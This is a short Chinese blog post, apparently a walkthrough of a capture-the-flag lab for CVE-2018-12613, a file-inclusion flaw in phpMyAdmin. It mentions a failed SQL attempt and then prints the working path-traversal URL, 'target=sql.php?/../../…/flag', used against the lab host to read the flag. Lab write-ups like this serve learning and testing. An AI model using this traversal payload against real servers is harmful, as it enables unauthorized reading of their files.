春秋云境CVE-2018-12613

张开发
2026/4/6 11:20:06 15 分钟阅读

分享文章

春秋云境CVE-2018-12613
1.阅读靶场介绍index.php中存在一处文件包含逻辑可以理解为对url做处理能想到的就是../../../../../flag2.启动靶场如上图所示看到这个界面我想到的就是select flag from flag出来但是本博主没有找到哟期待各位大神的评论3.poc这里博主是通过这个处理过的url夺旗的如下所示url在这里哟各位可以参考参考哟https://eci-2ze8e04kno5d57s1geyi.cloudeci1.ichunqiu.com:80/?targetsql.php?/../../../../../../../../flag到此相信各位都完成夺旗了感谢您宝贵的时间

更多文章